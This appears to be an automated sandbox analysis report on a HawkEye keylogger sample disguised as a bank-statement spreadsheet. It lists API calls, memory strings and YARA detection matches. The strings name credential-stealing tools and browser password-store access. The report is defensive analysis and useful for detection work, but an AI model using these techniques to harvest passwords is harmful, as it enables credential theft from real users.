                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 2_2_00449408 GetSubMenu,SaveDC,RestoreDC,GetWindowDC,SaveDC,RestoreDC,NtdllDefWindowProc_A,2_2_00449408
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 2_2_0042D6D0 NtdllDefWindowProc_A,2_2_0042D6D0
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 2_2_004397C4 NtdllDefWindowProc_A,GetCapture,2_2_004397C4
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 7_2_00408836 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,FreeLibrary,7_2_00408836
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 0_2_0044EEEC0_2_0044EEEC
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 0_2_004494080_2_00449408
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 1_2_0040D4261_2_0040D426
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 1_2_0040D5231_2_0040D523
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 1_2_0041D5AE1_2_0041D5AE
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 1_2_004176461_2_00417646
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 1_2_0040D6C41_2_0040D6C4
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 1_2_004429BE1_2_004429BE
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 1_2_00446AF41_2_00446AF4
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 1_2_0046ABFC1_2_0046ABFC
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 1_2_00463C4D1_2_00463C4D
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 1_2_00463CBE1_2_00463CBE
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 1_2_0040ED031_2_0040ED03
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 1_2_00463D2F1_2_00463D2F
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 1_2_00463DC01_2_00463DC0
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 1_2_0040CF921_2_0040CF92
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 1_2_0041AFA61_2_0041AFA6
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 1_2_0048F13D1_2_0048F13D
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 1_2_004899761_2_00489976
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 1_2_004F90171_2_004F9017
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 1_2_004F90A81_2_004F90A8
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 1_2_004A227A1_2_004A227A
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 1_2_004B028E1_2_004B028E
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 1_2_0043C7BC1_2_0043C7BC
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 2_2_0044EEEC2_2_0044EEEC
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 2_2_004494082_2_00449408
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 6_2_00404DDB6_2_00404DDB
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 6_2_0040BD8A6_2_0040BD8A
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 6_2_00404E4C6_2_00404E4C
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 6_2_00404EBD6_2_00404EBD
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 6_2_00404F4E6_2_00404F4E
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 7_2_004044197_2_00404419
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 7_2_004045167_2_00404516
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 7_2_004135387_2_00413538
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 7_2_004145A17_2_004145A1
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 7_2_0040E6397_2_0040E639
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 7_2_004337AF7_2_004337AF
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 7_2_004399B17_2_004399B1
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 7_2_0043DAE77_2_0043DAE7
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 7_2_00405CF67_2_00405CF6
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 7_2_00403F857_2_00403F85
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 7_2_00411F997_2_00411F99
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: String function: 00413F8E appears 66 times
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: String function: 00413E2D appears 34 times
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: String function: 00442A90 appears 36 times
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: String function: 004141D6 appears 88 times
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: String function: 00411538 appears 35 times
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: String function: 004035B4 appears 62 times
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: String function: 0044BA9D appears 36 times
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: String function: 0040C224 appears 36 times
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: String function: 004066B8 appears 32 times
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: String function: 00403980 appears 74 times
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: String function: 00404344 appears 36 times
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: String function: 00404320 appears 154 times
                Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2264
                Source: BANK-STATMENT _xlsx.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: BANK-STATMENT _xlsx.exe, 00000000.00000002.666309079.0000000002817000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameCMemoryExecute.dll@ vs BANK-STATMENT _xlsx.exe
                Source: BANK-STATMENT _xlsx.exe, 00000000.00000002.666309079.0000000002817000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameWebBrowserPassView.exeF vs BANK-STATMENT _xlsx.exe
                Source: BANK-STATMENT _xlsx.exe, 00000000.00000002.666309079.0000000002817000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamemailpv.exe< vs BANK-STATMENT _xlsx.exe
                Source: BANK-STATMENT _xlsx.exe, 00000000.00000002.666309079.0000000002817000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamePhulli.exe0 vs BANK-STATMENT _xlsx.exe
                Source: BANK-STATMENT _xlsx.exe, 00000000.00000002.665995495.00000000023A0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs BANK-STATMENT _xlsx.exe
                Source: BANK-STATMENT _xlsx.exeBinary or memory string: OriginalFilename vs BANK-STATMENT _xlsx.exe
                Source: BANK-STATMENT _xlsx.exeBinary or memory string: OriginalFileName vs BANK-STATMENT _xlsx.exe
                Source: BANK-STATMENT _xlsx.exe, 00000001.00000002.767713264.0000000002432000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamePhulli.exe0 vs BANK-STATMENT _xlsx.exe
                Source: BANK-STATMENT _xlsx.exe, 00000001.00000002.765706717.0000000000497000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameCMemoryExecute.dll@ vs BANK-STATMENT _xlsx.exe
                Source: BANK-STATMENT _xlsx.exe, 00000001.00000002.765706717.0000000000497000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameWebBrowserPassView.exeF vs BANK-STATMENT _xlsx.exe
                Source: BANK-STATMENT _xlsx.exe, 00000001.00000002.765706717.0000000000497000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamemailpv.exe< vs BANK-STATMENT _xlsx.exe
                Source: BANK-STATMENT _xlsx.exe, 00000001.00000002.775356177.0000000006E40000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameKernelbase.dll.muij% vs BANK-STATMENT _xlsx.exe
                Source: BANK-STATMENT _xlsx.exe, 0000000E.00000002.788401031.0000000002642000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameCMemoryExecute.dll@ vs BANK-STATMENT _xlsx.exe
                Source: BANK-STATMENT _xlsx.exe, 0000000E.00000002.788401031.0000000002642000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameWebBrowserPassView.exeF vs BANK-STATMENT _xlsx.exe
                Source: BANK-STATMENT _xlsx.exe, 0000000E.00000002.788401031.0000000002642000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamemailpv.exe< vs BANK-STATMENT _xlsx.exe
                Source: BANK-STATMENT _xlsx.exe, 0000000E.00000002.788526759.00000000026D7000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamePhulli.exe0 vs BANK-STATMENT _xlsx.exe
                Source: BANK-STATMENT _xlsx.exe, 0000000E.00000002.788122211.0000000002340000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs BANK-STATMENT _xlsx.exe
                Source: BANK-STATMENT _xlsx.exe, 0000000F.00000002.803780001.0000000003A81000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamemailpv.exe< vs BANK-STATMENT _xlsx.exe
                Source: BANK-STATMENT _xlsx.exe, 0000000F.00000002.803780001.0000000003A81000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameWebBrowserPassView.exeF vs BANK-STATMENT _xlsx.exe
                Source: BANK-STATMENT _xlsx.exe, 0000000F.00000002.799181132.0000000002312000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameCMemoryExecute.dll@ vs BANK-STATMENT _xlsx.exe
                Source: BANK-STATMENT _xlsx.exe, 0000000F.00000002.799067734.00000000022D2000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamePhulli.exe0 vs BANK-STATMENT _xlsx.exe
                Source: BANK-STATMENT _xlsx.exe, 0000000F.00000002.806976267.0000000006810000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameKernelbase.dll.muij% vs BANK-STATMENT _xlsx.exe
                Source: BANK-STATMENT _xlsx.exe, 00000010.00000002.812025899.0000000002260000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs BANK-STATMENT _xlsx.exe
                Source: BANK-STATMENT _xlsx.exe, 00000014.00000002.826494513.0000000002747000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameCMemoryExecute.dll@ vs BANK-STATMENT _xlsx.exe
                Source: BANK-STATMENT _xlsx.exe, 00000014.00000002.826494513.0000000002747000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameWebBrowserPassView.exeF vs BANK-STATMENT _xlsx.exe
                Source: BANK-STATMENT _xlsx.exe, 00000014.00000002.826494513.0000000002747000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamemailpv.exe< vs BANK-STATMENT _xlsx.exe
                Source: BANK-STATMENT _xlsx.exe, 00000014.00000002.826494513.0000000002747000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamePhulli.exe0 vs BANK-STATMENT _xlsx.exe
                Source: BANK-STATMENT _xlsx.exe, 00000015.00000002.852456722.0000000000402000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameCMemoryExecute.dll@ vs BANK-STATMENT _xlsx.exe
                Source: BANK-STATMENT _xlsx.exe, 00000015.00000002.852456722.0000000000402000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameWebBrowserPassView.exeF vs BANK-STATMENT _xlsx.exe
                Source: BANK-STATMENT _xlsx.exe, 00000015.00000002.852456722.0000000000402000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamemailpv.exe< vs BANK-STATMENT _xlsx.exe
                Source: BANK-STATMENT _xlsx.exe, 00000015.00000002.852539322.0000000000497000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamePhulli.exe0 vs BANK-STATMENT _xlsx.exe
                Source: BANK-STATMENT _xlsx.exe, 00000015.00000002.862199701.0000000006330000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameKernelbase.dll.muij% vs BANK-STATMENT _xlsx.exe
                Source: BANK-STATMENT _xlsx.exe, 0000001C.00000002.870211427.0000000002822000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamePhulli.exe0 vs BANK-STATMENT _xlsx.exe
                Source: BANK-STATMENT _xlsx.exe, 0000001C.00000002.870010845.00000000027A2000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameCMemoryExecute.dll@ vs BANK-STATMENT _xlsx.exe
                Source: BANK-STATMENT _xlsx.exe, 0000001C.00000002.870010845.00000000027A2000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameWebBrowserPassView.exeF vs BANK-STATMENT _xlsx.exe
                Source: BANK-STATMENT _xlsx.exe, 0000001C.00000002.870010845.00000000027A2000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamemailpv.exe< vs BANK-STATMENT _xlsx.exe
                Source: BANK-STATMENT _xlsx.exe, 0000001C.00000002.869457392.00000000022B0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs BANK-STATMENT _xlsx.exe
                Source: BANK-STATMENT _xlsx.exe, 0000001D.00000002.884712791.0000000002AC1000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameCMemoryExecute.dll@ vs BANK-STATMENT _xlsx.exe
                Source: BANK-STATMENT _xlsx.exe, 0000001D.00000002.882472409.0000000000482000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamePhulli.exe0 vs BANK-STATMENT _xlsx.exe
                Source: BANK-STATMENT _xlsx.exe, 0000001D.00000002.888847938.0000000006950000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameKernelbase.dll.muij% vs BANK-STATMENT _xlsx.exe
                Source: BANK-STATMENT _xlsx.exe, 0000001D.00000002.883042234.0000000000AD0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameWebBrowserPassView.exeF vs BANK-STATMENT _xlsx.exe
                Source: BANK-STATMENT _xlsx.exe, 0000001D.00000002.883042234.0000000000AD0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamemailpv.exe< vs BANK-STATMENT _xlsx.exe
                Source: BANK-STATMENT _xlsx.exe, 0000001D.00000002.882825216.00000000007A2000.00000004.00000020.sdmpBinary or memory string: OriginalFilenamemscorwks.dllT vs BANK-STATMENT _xlsx.exe
                Source: BANK-STATMENT _xlsx.exe, 0000001F.00000002.892381950.0000000002270000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs BANK-STATMENT _xlsx.exe
                Source: BANK-STATMENT _xlsx.exe, 00000021.00000002.903544550.00000000026C2000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamePhulli.exe0 vs BANK-STATMENT _xlsx.exe
                Source: BANK-STATMENT _xlsx.exe, 00000021.00000002.903399921.0000000002642000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameCMemoryExecute.dll@ vs BANK-STATMENT _xlsx.exe
                Source: BANK-STATMENT _xlsx.exe, 00000021.00000002.903399921.0000000002642000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameWebBrowserPassView.exeF vs BANK-STATMENT _xlsx.exe
                Source: BANK-STATMENT _xlsx.exe, 00000021.00000002.903399921.0000000002642000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamemailpv.exe< vs BANK-STATMENT _xlsx.exe
                Source: BANK-STATMENT _xlsx.exe, 00000021.00000002.902870919.0000000002340000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs BANK-STATMENT _xlsx.exe
                Source: BANK-STATMENT _xlsx.exe, 00000022.00000002.912614884.0000000002362000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameCMemoryExecute.dll@ vs BANK-STATMENT _xlsx.exe
                Source: BANK-STATMENT _xlsx.exe, 00000022.00000002.912614884.0000000002362000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameWebBrowserPassView.exeF vs BANK-STATMENT _xlsx.exe
                Source: BANK-STATMENT _xlsx.exe, 00000022.00000002.912614884.0000000002362000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamemailpv.exe< vs BANK-STATMENT _xlsx.exe
                Source: BANK-STATMENT _xlsx.exe, 00000022.00000001.893606211.00000000004D2000.00000040.00020000.sdmpBinary or memory string: w: %Scannot create INSTEAD OF trigger on table: %SINSERT INTO %Q.%s VALUES('trigger',%Q,%Q,0,'CREATE TRIGGER %q')type='trigger' AND name='%q'no such trigger: %Sno such column: %srows updated_rowid_cannot VACUUM from within a transactioncannot VACUUM - SQL statements in progressATTACH ':memory:' AS vacuum_db;ATTACH '' AS vacuum_db;PRAGMA vacuum_db.synchronous=OFFBEGIN EXCLUSIVE;SELECT 'CREATE TABLE vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE type='table' AND name!='sqlite_sequence' AND rootpage>0SELECT 'CREATE INDEX vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE sql LIKE 'CREATE INDEX %' SELECT 'CREATE UNIQUE INDEX vacuum_db.' || substr(sql,21) FROM sqlite_master WHERE sql LIKE 'CREATE UNIQUE INDEX %'SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence' SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';INSERT INTO vacuum_db.sqlite_master SELECT type, name, tbl_name, rootpage, sql FROM main.sqlite_master WHERE type='view' OR type='trigger' OR (type='table' AND rootpage=0)CREATE VIRTUAL TABLE %TUPDATE %Q.%s SET type='table', name=%Q, tbl_name=%Q, rootpage=0, sql=%Q WHERE rowid=#%dname='%q' AND type='table'vtable constructor failed: %svtable constructor did not declare schema: %shidden hiddenno such module: %sNOCASEauto-indextable %s: xBestIndex returned an invalid planat most %d tables in a joincannot use index: %sparser stack overflowset listnear "%T": syntax errortoo many arguments on function %Tqualified table names are not allowed on INSERT, UPDATE, and DELETE statements within triggersthe INDEXED BY clause is not allowed on UPDATE or DELETE statements within triggersthe NOT INDEXED clause is not allowed on UPDATE or DELETE statements within triggersinterruptunrecognized token: "%T"temp2011-01-28 17:03:50 ed759d5a9edb3bba5f48f243df47be29e3fe8cd7unable to close due to unfinalised statementsunable to close due to unfinished backup operationunknown errorunable to delete/modify user-function due to active statementsunknown database: %sunable to delete/modify collation sequence due to active statementsno such vfs: %sRTRIMmaindatabase corruption at line %d of [%.10s]misuse at line %d of [%.10s]cannot open file at line %d of [%.10s]\sqlite3.dll\mozsqlite3.dll\nss3.dllsqlite3_opensqlite3_preparesqlite3_stepsqlite3_column_textsqlite3_column_intsqlite3_column_int64sqlite3_finalizesqlite3_closesqlite3_exec\StringFileInfo\\VarFileInfo\Translation%4.4X%4.4X040904E4ProductNameFileDescriptionFileVersionProductVersionCompanyNameInternalNameLegalCopyrightOriginalFileNamelog profile.saveSIsignInvaultcli.dllVaultOpenVaultVaultCloseVaultVaultEnumerateItemsVaultFreeVaultGetInformationVaultG
                Source: BANK-STATMENT _xlsx.exe, 00000022.00000001.893606211.00000000004D2000.00000040.00020000.sdmpBinary or memory string: OriginalFilenamePhulli.exe0 vs BANK-STATMENT _xlsx.exe
                Source: BANK-STATMENT _xlsx.exe, 00000022.00000002.912185796.0000000000760000.00000004.00000020.sdmpBinary or memory string: OriginalFilenamemscorwks.dllT vs BANK-STATMENT _xlsx.exe
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeSection loaded: phoneinfo.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeSection loaded: ext-ms-win-xblauth-console-l1.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeSection loaded: ext-ms-win-xblauth-console-l1.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeSection loaded: phoneinfo.dll
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeSection loaded: ext-ms-win-xblauth-console-l1.dll
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeSection loaded: ext-ms-win-xblauth-console-l1.dll
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeSection loaded: phoneinfo.dll
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeSection loaded: ext-ms-win-xblauth-console-l1.dll
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeSection loaded: ext-ms-win-xblauth-console-l1.dll
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeSection loaded: phoneinfo.dll
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeSection loaded: ext-ms-win-xblauth-console-l1.dll
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeSection loaded: ext-ms-win-xblauth-console-l1.dll
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeSection loaded: phoneinfo.dll
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeSection loaded: ext-ms-win-xblauth-console-l1.dll
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeSection loaded: ext-ms-win-xblauth-console-l1.dll
                Source: 00000022.00000002.915921004.0000000003032000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 00000025.00000002.926331050.0000000002857000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 00000025.00000002.926331050.0000000002857000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 00000015.00000002.852456722.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 00000015.00000002.852456722.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 00000014.00000002.826494513.0000000002747000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 00000014.00000002.826494513.0000000002747000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 00000022.00000002.912614884.0000000002362000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 00000022.00000002.912614884.0000000002362000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 00000001.00000002.765706717.0000000000497000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 00000001.00000002.765706717.0000000000497000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 00000014.00000002.825220908.00000000026B2000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 00000014.00000002.825220908.00000000026B2000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 00000001.00000002.765500046.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 00000001.00000002.765500046.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 00000026.00000002.928753119.0000000000497000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 00000026.00000002.928753119.0000000000497000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 00000001.00000002.766725359.0000000002292000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 00000001.00000002.766725359.0000000002292000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 00000022.00000001.893606211.00000000004D2000.00000040.00020000.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 00000022.00000001.893606211.00000000004D2000.00000040.00020000.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 00000026.00000002.928377317.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 00000026.00000002.928377317.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 0000000E.00000002.788401031.0000000002642000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 0000000E.00000002.788401031.0000000002642000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 00000015.00000002.853095833.00000000021E2000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 00000015.00000002.853095833.00000000021E2000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
